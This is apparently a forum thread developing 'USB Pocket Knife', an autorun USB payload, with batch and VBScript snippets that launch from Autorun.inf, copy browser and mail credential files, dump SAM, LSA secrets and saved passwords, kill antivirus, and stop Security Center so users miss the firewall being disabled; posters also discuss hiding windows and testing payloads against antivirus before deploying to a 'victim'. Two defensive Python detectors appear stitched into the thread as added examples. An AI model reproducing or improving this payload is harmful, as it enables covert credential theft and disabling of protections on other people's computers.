USB Pocket-Knife Development


Leapo


I checked the self-made U3CUSTOM.ISO, but it is in the ISO. I tried making the ISO with "mkisofs" under Windows and under Linux with no success. As I know, Windows does not differentiate between capital and non-capital letters, although I tried using capital and non-capital letters for go.vbs. No success! Seems like a bug to me, so this is the way it works. If you like, you may use this in a README or in your instructions. Please feel free to improve my bad English or other errors.

<snip>

No worries, I'll be providing a pre-built ISO image from now on since so many people seem to be having trouble figuring out how to build the darn thing :P

@Leapo: great work ! And yes, this was the thing I needed. Thanks !
The disarm function will be in the next release, which isn't too far off.

U3 is now working fine
Yay!

There is one thing I tried to change but did not manage: getting Explorer started in the root of the USB drive when clicking on the USB-stick icon. I had the same problem with siliveron's switchblade, but got it solved by adding a batch file to which the Autorun.inf did point. Accidentally I deleted this batch file (shame on me), and got no copy of it.
Currently, the payload has the option of opening the LOGS folder when it's finished running. It won't be any trouble at all adding the root of the drive as an alternate location. Look for it in the next payload release.

hey, I don't know if this has been mentioned, but how about a program that will verify if the malicious program is detectable? like it loads a list that it downloads from the internet and feeds the program into kaspersprays online verifier; if it's undetectable then download to the victim's PC, if not go on to the next program
Actually, that's a very good idea, I'll look into it.

I got half the way now! Thanks to siliveron, he still had the little batch file I sent him in his mails! hurray!!!

So, to the NON-U3, I changed this:

1. Added a file named "go.bat" to \SYSTEM

2. Let Autorun.inf point to this file

In go.bat I got these lines:

--------

@echo off

%windir%\explorer.exe /E,/N,%CD%

wscript SYSTEM\go.vbs

---------

What did it change? Well, most people just click away the window which offers to start the stick with the program (damned, security-minded Microsoft coders!)

But, using this, clicking on the drive in (is it?) "Workplace" (sorry, I only have a German version of Windows XP),

the payload is executed. I am no good coder, there is still the problem with the opening DOS window. I am working on getting it hidden. I would be pleased with any help.
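The Autorun.inf -> go.bat -> wscript go.vbs chain described in this post is exactly what a defender wants to spot on removable media before anyone clicks the drive icon. The script below is an added example, not code from the thread or from the Pocket-Knife project: it parses an autorun.inf and flags directives that launch something (open, shellexecute, shell\...\command), invocations of a script host such as the wscript call above, and an action label that imitates Explorer's own "Open folder to view files" prompt. Both sample files are constructed for the example.

```python
"""Audit an autorun.inf for launch directives (added example; inputs are constructed)."""
from dataclasses import dataclass
from typing import Dict, List

# Extensions that mean the directive runs code rather than just showing an icon or label.
CODE_EXTENSIONS = (".bat", ".cmd", ".vbs", ".vbe", ".js", ".jse", ".wsf",
                   ".exe", ".com", ".scr", ".pif")
SCRIPT_HOSTS = ("wscript", "cscript", "cmd.exe", "cmd ", "powershell")

# Constructed sample modelled on the layout in the thread: Autorun.inf -> SYSTEM\go.bat
SUSPICIOUS_AUTORUN = """\
[AutoRun]
open=SYSTEM\\go.bat
icon=SYSTEM\\drive.ico
action=Open folder to view files
shell\\open\\command=SYSTEM\\go.bat
"""

# Constructed benign file: icon and label only, nothing is executed.
BENIGN_AUTORUN = """\
[autorun]
icon=setup.ico
label=Vendor Drivers
"""


@dataclass
class Finding:
    key: str
    value: str
    reason: str


def parse_autorun(text: str) -> Dict[str, str]:
    """Return {key: value} for the [autorun] section; keys lower-cased, section name case-insensitive."""
    entries: Dict[str, str] = {}
    in_autorun = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries


def audit_autorun(text: str) -> List[Finding]:
    """Flag directives that cause code to run or that lure a user into clicking."""
    findings: List[Finding] = []
    for key, value in parse_autorun(text).items():
        lowered = value.lower()
        # 'open'/'shellexecute' run on AutoPlay; shell\<verb>\command runs when the drive icon is opened.
        launches = key in ("open", "shellexecute") or (key.startswith("shell\\") and key.endswith("\\command"))
        if launches:
            if any(host in lowered for host in SCRIPT_HOSTS):
                findings.append(Finding(key, value, "launch directive invokes a script host"))
            elif any(tok.endswith(CODE_EXTENSIONS) for tok in lowered.split()):
                findings.append(Finding(key, value, "launch directive targets an executable or script"))
            else:
                findings.append(Finding(key, value, "launch directive present"))
        elif key == "action" and "folder" in lowered:
            findings.append(Finding(key, value, "action label imitates Explorer's 'Open folder' prompt"))
        elif key == "useautoplay" and lowered == "1":
            findings.append(Finding(key, value, "forces AutoPlay handling"))
    return findings


if __name__ == "__main__":
    for name, sample in (("suspicious", SUSPICIOUS_AUTORUN), ("benign", BENIGN_AUTORUN)):
        result = audit_autorun(sample)
        print(f"{name}: {len(result)} finding(s)")
        for f in result:
            print(f"  {f.key}={f.value}  <- {f.reason}")
```

Run against a mounted drive's autorun.inf, any finding in the first group is enough to quarantine the device; the action-label check only adds weight, since legitimate installers also set action text.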


to make it more stealthy you might be able to use http://www.commandline.co.uk/cmdow/ so you can hide the windows and such

I did and it works great, it makes it uber stealthy

it supports batch commands, which I used to hide all my cmd windows and such

you can hide any window with it, so it's not only useful here, you can use it elsewhere

it lets you do things to windows that you wouldn't be able to do normally


I know cmdow, and thought of using it. But this should be the last resort. I thought there might be a way offered by the system itself. And as I am not so experienced with Windows coding, I have the hope that someone else knows it.

If no one knows, I will use cmdow indeed. Thanks anyway.


Hi, new to the forum & have been playing with Leapo's payload.

Noticed a few things in Start.bat...

:: Performs a safety check. if the file safety.txt is found on the root of your C:\ drive, the payload will not run by default.
IF NOT EXIST %config%\Safety_Check.cfg GOTO SkipSafetyCheck
IF EXIST C:\safety.txt GOTO End
:SkipSafetyCheck

:: Finds the location of the flash partition and set master variable.
@ECHO off
IF EXIST ..\CONFIG\Test_Mode.cfg GOTO TestMode
FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
	IF EXIST %%i:\CONFIG\Drive_Location.cfg (
        SET flshdrv=%%i:\
		)
	)

:: Sets Variables and paths
IF NOT EXIST %flshdrv%\LOGS\%computername% MD %flshdrv%\LOGS\%computername%
SET logdir="%flshdrv%\LOGS\%computername%
SET log="%flshdrv%\LOGS\%computername%\%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%].log"
SET tmplog="%flshdrv%\LOGS\%computername%\%computername%_TEMP.log"
IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\PROGS\") ELSE (SET progdir=".\SYSTEM\PROGS\")
SET config="%flshdrv%\CONFIG\"

First, please notice that the second line references %config%, but it isn't defined until the bottom of the block I quoted.

Second, just before your FOR loop you have a conditional to branch off to TestMode, which doesn't have a destination label (I'm assuming you had one further down for testing something???)

and Third, The multiple "No Disk" errors appear to be coming from the FOR loop. I was playing with GonZor's payload and noticed that his "SET LOG PATHS" section looks like:

@ECHO on

CD \System\SRC >NUL

:: SET LOG PATHS
	IF NOT EXIST %1\System\Logs\%computername% (
		MD %1\System\Logs\%computername%
		)
	SET logdir="%1\System\Logs\%computername%
	SET log="%1\System\Logs\%computername%\%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%].log"
	SET tmplog="%1\System\Logs\%computername%\%computername%_TEMP.log"
	SET include="%1\System\SRC\Include
	SET /p eipurl=<"%1\System\SRC\Include\EIP.dat"
	SET U3="%cd%

Notice that he doesn't set a %flashdrv%, he's using %1 which is the first parameter passed from go.vbs. Your go.vbs is passing the same parameter, so you should be able to get rid of that FOR loop.

(Is there some reason you did it the way you did that I'm unaware of???)

I also get the "No Disk" error when I run Menu.bat. (for the same reason) It's not as critical there seeing Menu.bat is only run when I wanna change the thumbdrive's configuration.

Your csrss.exe is killing Avast alright, but for some reason is opening a lot of dos windows. I haven't figured that one out yet.

BTW, is Start.bat restored from Backup.rar???


With every release I try to integrate it with portable apps cause they are extremely useful/helpful and I am kinda needing help with it.

Also I am getting an issue with all of the batch files and most importantly the menu.bat this is what happens

[attached screenshot: post-10590-1220812218_thumb.jpg]

I have no freaking clue what to do.

Can someone help me?

EDIT: So yeah, I didn't see tmbomber's post before I posted, but I guess we are getting the same problem


to make it more stealthy you might be able to use http://www.commandline.co.uk/cmdow/ so you can hide the windows and such

I did and it works great, it makes it uber stealthy

it supports batch commands, which I used to hide all my cmd windows and such

you can hide any window with it, so it's not only useful here, you can use it elsewhere

it lets you do things to windows that you wouldn't be able to do normally

I don't see any need for it, the payload already runs silently (no window appears). Is that not working for you?

Hi, new to the forum & have been playing with Leapo's payload.

Noticed a few things in Start.bat...

<snip>

First, please notice that the second line references %config%, but it isn't defined until the bottom of the block I quoted.

Nice bug hunting there, I'll shift things around so that works correctly.

Second, just before your FOR loop you have a conditional to branch off to TestMode, which doesn't have a destination label (I'm assuming you had one further down for testing something???)
Yes, at one point I had the drive set up so that it could be run from a folder on my hard disk when testing mode was enabled (so I didn't need to work on the payload off of a flash drive).

and Third, The multiple "No Disk" errors appear to be coming from the FOR loop. I was playing with GonZor's payload and noticed that his "SET LOG PATHS" section looks like:

<snip>

Notice that he doesn't set a %flashdrv%, he's using %1 which is the first parameter passed from go.vbs. Your go.vbs is passing the same parameter, so you should be able to get rid of that FOR loop.

(Is there some reason you did it the way you did that I'm unaware of???)

I also get the "No Disk" error when I run Menu.bat. (for the same reason) It's not as critical there seeing Menu.bat is only run when I wanna change the thumbdrive's configuration.

I did it that way so that the batch files could be called, by hand, without needing to launch them through a VB script. I'm going to see if I can revise that FOR loop to fix the problem, but if I can't, then VBS it is...

Your csrss.exe is killing Avast alright, but for some reason is opening a lot of dos windows. I haven't figured that one out yet.
I think that's just the way the app operates, I'm trying to figure out a way to hide the prompts it spawns though... until then, it's disable-able through menu.bat if you don't want the windows and can live without it (better than not including it at all).

BTW, is Start.bat restored from Backup.rar???
Yes...why do you ask? lol.

I don't see any need for it, the payload already runs silently (no window appears). Is that not working for you?

That was more directed towards vanguard than you. I also just now thought you could use it to deal with the prompts that spawn with csrss.exe, just a thought.


First off I would like to say thanks for everything everyone has done here.

And I know this is my first post and I just registered, but I have been following the development of all this stuff here for a while as a guest and felt like making a comment on this, so I registered.

Anyways, getting to the point,

Do you not think that you should run something like,

net stop "security center"

before killing the firewall to hide the fact that it's been killed?

because most will notice the nice little red shield down there in their task bar pretty quick

now I'm running Win XP so I'm not sure if the command is the same in Vista or any other OS

but ya, I'm just putting it out there because I know I added that little bit of code in the script for me because, like I said, most will notice that little red shield pop up right off the bat.

So ya, I'm just saying kill the security center before the firewall and ya should make things a lot more behind the scenes, you know.

Also, I know it kinda makes things obvious, but I also added right before the end a time change lol to change the time of the infected system to 11:11am; that way I know when all the processes are complete and it's safe to remove the USB

Anyways, tell me what you think.


UPDATE: VERSION 0.8.2.0 IS OUT!

Safety.txt Being Ignored - BUG FIX

There was a slight issue with the way things were ordered in Start.bat that caused safety.txt to be ignored (the payload would run anyway) on all systems. This has been resolved. It is highly recommended you update to this version for this bug fix.

No Disk Errors While Running the Payload or Menu.bat - BUG FIX

It's not pretty, but I've reworked the drive detection script in both menu.bat and start.bat so that they no longer create No Disk errors when run on some systems.

Menu System - NEW FEATURE

The ability to "disarm" the payload has been added to menu.bat (Menu.bat > Manage Settings and Modules > Other Options). When the payload is disarmed, it will not run in any system it is inserted into.

Menu System - NEW FEATURE

You can now have three choices for what to do when the payload has finished running, open the root of the drive, the logs folder, or no folder at all. (Menu.bat > Manage Settings and Modules > Other Options).

ReadMe - UPDATED

The Readme documentation has been brought up to date a bit, errors removed and additional information added.

Modules - UPDATED

The "Disable Firewall" module now stops the Windows Security Center before disabling the Windows Firewall. This prevents Windows from issuing the user a notification about the Windows Firewall being disabled.

DOWNLOAD THE USB POCKET KNIFE V0.8.2.0

Includes both U3 and Non-U3 versions. The U3 version has the ISO sources but no pre-built ISO. I know I said this would have a pre-built ISO, but I had to get that first bugfix out before people started pwning themselves. Happy Downloading!

Download Mirrors:

RapidShare, MegaUpload
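The "stop Security Center, then disable the firewall" ordering suggested a few posts up and shipped in the 0.8.2.0 "Disable Firewall" module hides the tray notification from the user, but from the defender's side it is a recognisable sequence in the System event log: the Service Control Manager writes event 7036 for every service state change. The Python below is an added example, not code from the thread or the project. It runs that detection over constructed sample log lines (the export format `timestamp|source|event id|message` is an assumption of the example) and alerts on a Windows Firewall stop that follows a Security Center stop within a short window, while firewall stops with Security Center still running are only reported as informational.

```python
"""Detect a Security Center stop followed by a Windows Firewall stop (added example)."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional, Tuple

# Windows XP service display names as they appear in Service Control Manager event 7036.
SECURITY_CENTER = "Security Center"
FIREWALL = "Windows Firewall/Internet Connection Sharing (ICS)"

# Constructed sample of System-log entries exported as 'timestamp|source|event id|message'.
SAMPLE_EVENTS = """\
2008-09-08 14:02:58|Service Control Manager|7036|The Print Spooler service entered the running state.
2008-09-08 14:03:11|Service Control Manager|7036|The Security Center service entered the stopped state.
2008-09-08 14:03:12|Service Control Manager|7036|The Windows Firewall/Internet Connection Sharing (ICS) service entered the stopped state.
2008-09-08 15:40:02|Service Control Manager|7036|The Security Center service entered the running state.
2008-09-09 09:12:44|Service Control Manager|7036|The Windows Firewall/Internet Connection Sharing (ICS) service entered the stopped state.
"""

STATE_RE = re.compile(r"^The (?P<service>.+) service entered the (?P<state>\w+) state\.$")


@dataclass
class ServiceEvent:
    time: datetime
    service: str
    state: str


def parse_events(log_text: str) -> List[ServiceEvent]:
    """Keep only SCM 7036 state-change events, parsed and sorted by time."""
    events: List[ServiceEvent] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, source, event_id, message = line.split("|", 3)
        if source != "Service Control Manager" or event_id != "7036":
            continue
        m = STATE_RE.match(message)
        if not m:
            continue
        events.append(ServiceEvent(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                                   m.group("service"), m.group("state")))
    events.sort(key=lambda e: e.time)
    return events


def find_firewall_blinding(log_text: str, window_seconds: int = 60
                           ) -> Tuple[List[Tuple[datetime, datetime]], List[datetime]]:
    """Return (sequences, lone_stops).

    sequences: (security_center_stop, firewall_stop) pairs where the firewall stopped within
    window_seconds of Security Center stopping and Security Center had not come back in between.
    lone_stops: firewall stops with Security Center still running (informational only).
    """
    sequences: List[Tuple[datetime, datetime]] = []
    lone_stops: List[datetime] = []
    last_sc_stop: Optional[datetime] = None
    for ev in parse_events(log_text):
        if ev.service == SECURITY_CENTER:
            # A restart of Security Center clears the pending stop.
            last_sc_stop = ev.time if ev.state == "stopped" else None
        elif ev.service == FIREWALL and ev.state == "stopped":
            if last_sc_stop is not None and ev.time - last_sc_stop <= timedelta(seconds=window_seconds):
                sequences.append((last_sc_stop, ev.time))
            else:
                lone_stops.append(ev.time)
    return sequences, lone_stops


if __name__ == "__main__":
    seqs, lone = find_firewall_blinding(SAMPLE_EVENTS)
    for sc, fw in seqs:
        print(f"ALERT: Security Center stopped {sc}, firewall stopped {fw} ({(fw - sc).seconds}s later)")
    for fw in lone:
        print(f"INFO: firewall stopped {fw} with Security Center still running")
```

The window is deliberately short: the batch module issues the two stops back to back, so a gap of more than a minute is far more likely to be an administrator working through a maintenance checklist than a payload.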


File Savr is doing a little promotion, allowing you to upload things to their server for free until the 15th, so I'm capitalizing on the time by uploading the USB Pocket Knife to their site. Here's a link. It should be valid until File Savr goes out of business. And the best part is plain text compresses VERY well, from 47.8MB to 4.1 MB.

e:Typo >.<


hey guys, I know this sounds extremely n00bish, but I am working on some .bat to go along with the pocket-knife, and was wondering what I can do to bypass "press any key to continue". here is a snippet of code; if you can make it just copy from the root directory {file} to c:\what\ with no confirmation

xcopy \[file] c:\what\ /w /e /i


Thank you for posting your update :)

OK, more bug hunting in no particular order.

For some reason, the beginning of my log files looks like:

----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+         [Dump SAM FGDUMP]        + 
+----------------------------------+ 
+----------------------------------+ 
----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+         [Dump Firefox PW]        + 
+----------------------------------+ 


 Error : Firefox profile directory does not exist..
 You have entered profile path = [\FirePassword.exe] 

 FirePassword (Ver 2.0.1) : Firefox Username & Password List Decryptor 
		 by Nagareshwar Y Talekar 
 For latest version visit http://www.securityxploded.com.


 Usage : 
	 .\SYSTEM\PROGS\ [-m "master password" ] [Firefox_Profile_Directory] 

----------------------------------------------------------------------------------------------------------------------------- 
+----------------------------------+ 
+           [Dump IE PW]           + 
+----------------------------------+ 
==================================================
Entry Name        : xxx
Type              : xxx
Stored In         : xxx
User Name         : xxx
Password          : xxx
==================================================

It's not even outputting:

:: Logged modules
:: Header information
ECHO ----------------------------------------------------------------------------------------------------------------------------- > %log% 2>&1
ECHO Leapos Payload [Time Started: %date% %time%] >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO Computer Name is: %computername% and the Logged on User Is: %username% >> %log% 2>&1

which confuses me quite a bit. (btw, notice that the first echo line there only has one > at the end of it)

The "no disk" error still persists when running Menu.bat (at least on my machine), but doesn't happen when you're actually sticking the thumb drive in a machine. So good job there.

Just noticed a minor one in Start.bat...

:: NetScape Data
mkdir %logdir%\%computername%\Slurp_Data\NetScape\
xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*.db" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y
xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*.dat" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y
xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*bookmarks.html" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y
:: Opera Data
mkdir %logdir%\Slurp_Data\Opera\
xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\profile\*.dat" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y
xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\mail\*.dat" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y
xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\mail\*.ini" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y

Notice the difference in the mkdir lines. The one for Netscape has an extra %computername% thrown in there, which creates an extra computername directory inside the computername directory. Netscape's mkdir line is the only one like it, so just removing the extra %computername%\ will clean up the log directory a bit.

:: Checks to see if the payload is disarmed
IF NOT EXIST %flshdrv%\CONFIG\Disarm_Payload.cfg GOTO SkipDisarm
IF EXIST %config%\Disarm_Payload.cfg GOTO End
:SkipDisarm	

:: Sets Variables and paths to clean up pathnams later on
IF NOT EXIST %flshdrv%\LOGS\%computername% MD %flshdrv%\LOGS\%computername%
SET logdir="%flshdrv%\LOGS\%computername%
SET log="%flshdrv%\LOGS\%computername%\%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%].log"
SET tmplog="%flshdrv%\LOGS\%computername%\%computername%_TEMP.log"
IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\PROGS\") ELSE (SET progdir=".\SYSTEM\PROGS\")
SET config="%flshdrv%\CONFIG\"

I'm afraid we have another %config% being used before config is defined issue.

Port scan appears to be dumping its help file. I'm uncertain why. It appears to dump its information to the templog file, then appends templog to the normal log file. I'd add a -v to "%progdir%\portqry -local -l %tmplog% >> %log% 2>&1" just to get more verbose output.

Also for some reason a templog file is being left. It looks like it should be deleted, but for some reason it's left after the .bat file is done. I'll have to think on that one.

AVKill still pops up the dos windows. (like 8 of them) I'm still unsure how to deal with that. For the time being I'm disabling AVKill and just manually turning off the AV before inserting the thumb drive.

Three of the password recovery programs are popping up windows and not closing them. It's late & I don't remember which. I'll check that more tomorrow.

And finally....

Running this on an XP x64 machine causes a lot of the programs to fail. I only wind up with about half the information. I'm looking into that one too.


hey guys, I know this sounds extremely n00bish, but I am working on some .bat to go along with the pocket-knife, and was wondering what I can do to bypass "press any key to continue". here is a snippet of code; if you can make it just copy from the root directory {file} to c:\what\ with no confirmation

xcopy \[file] c:\what\ /w /e /i

I'm not sure if we can post links to things here or whatnot, but this should help you; I know I still use it for reference from time to time

http://www.computerhope.com/msdos.htm

this is the link to the xcopy commands http://www.computerhope.com/xcopyhlp.htm

hope that helps you out some


Hi Leapo,

thanks for this cool release. Just my feedback here.

Safety.txt Being Ignored - BUG FIX

There was a slight issue with the way things were ordered in Start.bat that caused safety.txt to be ignored (the payload would run anyway) on all systems. This has been resolved. It is highly recommended you update to this version for this bug fix.

--

Cool, I already wondered, why it did not work. Just a question: The file safety.txt must be in the root of drive C:\ ?

Not in the root of the usb-drive ???

--

No Disk Errors While Running the Payload or Menu.bat - BUG FIX

It's not pretty, but I've reworked the drive detection script in both menu.bat and start.bat so that they no longer create No Disk errors when run on some systems.

Menu System - NEW FEATURE

The ability to "disarm" the payload has been added to menu.bat (Menu.bat > Manage Settings and Modules > Other Options). When the payload is disarmed, it will not run in any system it is inserted into.

--

Yeah! Great!!! This is what I was looking for. So I can use the USB drive as normal, without the danger of accidentally compromising some computers. Thanks for that!

--

Menu System - NEW FEATURE

You can now have three choices for what to do when the payload has finished running, open the root of the drive, the logs folder, or no folder at all. (Menu.bat > Manage Settings and Modules > Other Options).

--

Yes, this is what I am looking for, too. With this cool new feature my workaround with the "go.bat" is no more needed. Cool !

--

ReadMe - UPDATED

The Readme documentation has been brought up to date a bit, errors removed and additional information added.

--

I am missing an installation procedure in the Readme.txt (how to flash the drive etc. ). If you do not mind, you can use mine out of the forum. Otherwise I can offer you, to improve it myself and send it to you. Just ask.

--

Modules - UPDATED

The "Disable Firewall" module now stops the Windows Security Center before disabling the Windows Firewall. This prevents Windows from issuing the user a notification about the Windows Firewall being disabled.

DOWNLOAD THE USB POCKET KNIFE V0.8.2.0

Includes both U3 and Non-U3 versions. The U3 version has the ISO sources but no pre-built ISO. I know I said this would have a pre-built ISO, but I had to get that first bugfix out before people started pwning themselves. Happy Downloading!

Download Mirrors:

RapidShare, MegaUpload

Some additional thing: I am missing the antidote for the keylogger. The folder is empty. Is there any ?

What license is your work of ? Can it be GPL ? Free is always fine.

Again: Thank you very much for the improvements !


A big one just cropped up. It looks like Go.vbs is executing multiple copies of start.bat.

(it explains why the beginning of my log file is so messed up)

Here's the FOR loop from GonZor's GO.vbs:

For Each objDrive in colDrives
    If objFSO.FileExists(objDrive.DriveLetter & ":\System\SRC\drv.dat") Then
        strPath = objDrive.Driveletter & ":"
        If objFSO.FileExists(strPath & "\System\SRC\U3.dat") Then
            objShell.Run ".\LaunchU3.exe -a"
        End If
        If objFSO.FileExists(strPath & "\System\SRC\PL.dat") Then
            objShell.Run ".\System\SRC\go.bat " & strPath , 0, False
        End If
    End If
Next

and here's yours:

For Each objDrive in colDrives
    If objFSO.FileExists(strPath & "\SYSTEM\Start.bat") Then
        objShell.Run ".\SYSTEM\Start.bat " & strPath , 0, False
    End If
Next

GonZor's got that launcher thing in there, but notice he sets the variable "strPath" in the third line. Yours uses it in the second line, but it's never set.

I think this might work:

For Each objDrive in colDrives
    strPath = objDrive.Driveletter & ":"
    If objFSO.FileExists(objDrive.DriveLetter & ":\SYSTEM\Start.bat") Then
        objShell.Run ".\System\Start.bat " & strPath , 0, False
    End If
Next

I'll be giving it a try tomorrow night.


Little idea: Currently slurp uses some hardcoded paths, e.g. "C:\Documents and Settings\%username%\Application Data\Mozilla\Firefox\Profiles\*signons.txt" - this is imo not very portable. If someone set up Windows on another drive than C:\, moved folders around, or doesn't use a US version, the paths differ.

First thing that shouldn't be too complicated: Application Data and the user's profile folder are available as environment variables

%APPDATA% -> C:\Documents and Settings\%username%\Application Data (not for WinNT)
%HOMEPATH% -> C:\Documents and Settings\%username%

Sadly there are no variables for desktop and my documents (or I could not find them), so in this case it would be helpful to get the path out of the registry (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders).


A big one just cropped up. It looks like Go.vbs is executing multiple copies of start.bat.

< snip >

I think this might work:

For Each objDrive in colDrives
    strPath = objDrive.Driveletter & ":"
    If objFSO.FileExists(objDrive.DriveLetter & ":\SYSTEM\Start.bat") Then
        objShell.Run ".\System\Start.bat " & strPath , 0, False
    End If
Next

I'll be giving it a try tomorrow night.

Yup, that was it. Now AVKill only opens one dos window and the log file is a lot cleaner...

Other issues...

On XP x64 Menu.bat still gives about four or five "No Disk" errors when you run it. This doesn't happen with standard XP. I don't get any "No Disk" errors with XP standard or x64 when the payload runs.

Moved:

:: Opens the logs folder
IF NOT EXIST %config%\Open_Drive_Logs.cfg GOTO SkipOpenDrv
start /wait %flshdrv%\LOGS\
:SkipOpenDrv

:: Opens the root of the drive folder
IF NOT EXIST %config%\Open_Drive_Root.cfg GOTO SkipOpenDrvRt
start /wait %flshdrv%
:SkipOpenDrvRt

To the bottom of the .bat file. That way the window opens when things are all done. There is a delay depending on what all you have turned on. but for stealth I'd have the "open window" feature turned off anyway.

IF NOT EXIST %config%\Dump_Mail_PWP.cfg GOTO SkipMailPW
	ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
	ECHO +----------------------------------+ >> %log% 2>&1
	ECHO +          [Dump Mail PW]          + >> %log% 2>&1
	ECHO +----------------------------------+ >> %log% 2>&1
		%progdir%\mailpv.exe /stext %tmplog% >> %log% 2>&1
		COPY %log%+%tmplog%* %log%  >> NUL
		DEL /f /q %tmplog% >NUL
:SkipMailPW

in the top line, Dump_Mail_PWP.cfg should be Dump_Mail_PW.cfg

IF NOT EXIST %config%\Dump_Updates_List.cfg GOTO SkipUdateList
	ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
	ECHO +----------------------------------+ >> %log% 2>&1
	ECHO +        [Dump Updates-List]       + >> %log% 2>&1
	ECHO +----------------------------------+ >> %log% 2>&1
		%progdir%\wul.exe /stext %tmplog% >> %log% 2>&1
		COPY %log%+%tmplog%* %log%  >> NUL
		DEL /f /q %tmplog% >NUL
:SkipUdateList

First line, Dump_Updates_List.cfg should read as: Dump_Update_List.cfg

Dump Mail PW, Dump Network PW, Dump Messenger PW, and Dump LSA Secrets all open windows and need to be manually closed.

Dump Firefox PW can't seem to find the Firefox directory on x64. I haven't checked it on standard XP yet.

Here's a fun one...

If you have Dump IE PW and Dump Messenger PW turned on, for some reason the tmplog isn't deleted at the end of Dump IE PW, if Dump Messenger PW doesn't generate output, the tmplog from Dump IE PW gets put in the Dump Messenger PW's output block.

It seems the tmplog isn't being deleted on several occasions. (I'm still trying to figure out why)


it is so buggy it doesn't even work on my U3 drive

it doesn't auto run

it's not stealthy

it doesn't even do what it is intended to do

Well...

Implement the fixes I posted and disable IE PW, LSA secrets, mail PW, MSN Messenger PW, Network PW, and AVKILL and it runs in stealth.

How about helping with the debugging???


Discovered something...

netstat.exe -abn >> %log% 2>&1

The b option works on some OS's, but not on all.

I tried it with and without and if it's available I think I wanna see the b output. Easy solution, do it twice:

netstat.exe -an >> %log% 2>&1

netstat.exe -abn >> %log% 2>&1

Another thing I noticed...

GonZor's payload launches all the password programs without opening windows...

Hey GonZor... How'd ya pull that one off??? (presently trying to reverse engineer what ya did)
